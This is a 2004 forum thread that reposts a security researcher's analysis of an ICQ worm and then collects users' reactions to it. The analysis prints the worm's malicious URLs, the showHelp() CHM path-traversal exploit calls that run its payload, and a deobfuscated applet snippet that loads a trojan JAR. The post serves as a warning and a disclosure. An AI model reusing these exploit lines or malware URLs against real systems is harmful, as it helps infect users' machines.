Results 1 to 7 of 7

Thread: ICQ Worm!

  1. #1

    Default ICQ Worm! (Do not click on the URLs until you've finished reading the whole article!)

    Extracted from: http://www.daemonology.net/ICQworm/worm.txt

    WARNING: DO NOT CLICK ON THE LINKS WITHOUT FINISHING READTING THROUGH THIS ARTICLE!!!

    Summary: A worm is spreading via ICQ, using a flaw in MSIE and a
    misconfiguration in ICQ itself. As a side effect (or, quite likely,
    the intended purpose), it installs JAVA_BYTEVER.A (or some variant thereof).

    The following page contains malware: http://www.jokeworld.biz/index.html
    It does the following:
    1. Opens up http://www.joecartoon.com/pages/cartoons/ to give the user
    something to watch.

    2. Opens up http://www.jokeworld.biz/meine.scm, using the ICQ flaw
    described at
    http://archives.neohapsis.com/archiv...2-07/0182.html
    to execute it.

    2.1. If ICQ is currently running, the following files will be created:
    c:\program files\ICQ\sounds\meine\ChatAction.wav (1088kb of zero bytes)
    c:\program files\ICQ\sounds\meine\ChatEmote.wav (empty)
    c:\program files\ICQ\sounds\meine\FileDone.wav (513kb of zero bytes)
    c:\program files\ICQ\sounds\meine\WebSearch.wav (empty)
    c:\program files\ICQ\sounds\meine\Startup.wav (compiled html file, exploit
    code)

    3. Uses the exploit described at
    http://www.securitytracker.com/alert...c/1008578.html
    to execute the exploit code using the compiled help viewer:
    showHelp("mk:@MSITStore:iexplore.chm::..\\..\\..\\ ..\\program files\\ICQ\\Sounds\\meine[1]\\Startup.wav::/ie****er.html");
    showHelp("mk:@MSITStore:iexplore.chm::..\\..\\..\\ ..\\program files\\ICQ\\Sounds\\meine\\Startup.wav::/ie****er.html");

    3.1. Microsoft's chm format is insufficiently documented for me to get any
    further than this without an airgapped system, but I assume it modifies
    ICQ's startup procedure to cause the observed symptom of sending
    "http://www.jokeworld.biz/index.html ) LOL" to all contacts at startup.

    4. Opens up http://www.sx2group.com/user_bx.html, which after deobfuscating
    runs the following code:
    <HTML><HEAD>
    <script>
    <applet width=1 height=1 ARCHIVE=nocheat.jar code=Counter>;
    <param name='ac' value='BX'>;
    <param name='ua' value='"+navigator.userAgent+"'>;
    <param name='pl' value='"+navigator.platform+"'>;
    </applet>;
    </BODY></HTML>

    4.1. nocheat.jar is detected by PC-cillin as JAVA_BYTEVER.A.

    Thanks to: Wampus, for getting infected and thereby informing me of this.

    Colin Percival
    cperciva@daemonology.net
    Last edited by Linkster; 24th February 2004 at 07:52 PM.

  2. #2
    Member
    Join Date
    Nov 2003
    Location
    Northeast
    Posts
    1,226

    Default

    Oh, so it IS a worm! I was quite surprised when I received the exact same message from two different contacts in my ICQ at the same time. I clicked on the link, but closed it before it loaded cos I thought it a bit weird. Hmm.. guess I should have to run a virus scan...

  3. #3
    Deregistered
    Join Date
    Dec 2002
    Location
    Singapore
    Posts
    6,601

    Default

    now, if there was only a way to remove it for those affected...

  4. #4
    Member
    Join Date
    May 2003
    Location
    East
    Posts
    706

    Default

    Doesn't affect you if you use a mac....

  5. #5
    Senior Member
    Join Date
    Jan 2002
    Location
    South Pole with Penguin
    Posts
    5,270

    Default

    Wow...most detailed documentation about this ICQ wormz

  6. #6

    Default

    What if I'm using a non-ICQ program like Trillian or Miranda? Will I still be infected and send out those LOL msgs?
    I think I clicked on the link, but when my firewall prog warned me abt something related to ICQ, I denied access...I hope.

  7. #7
    Member ransoma22's Avatar
    Join Date
    Mar 2002
    Location
    KTV Lounge Hall
    Posts
    1,212

    Default More news on this Bizex Wormz

    Read more information on this wormz
    at Google news..
    http://news.google.com/news?hl=en&lr...rm&sa=N&tab=wn

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •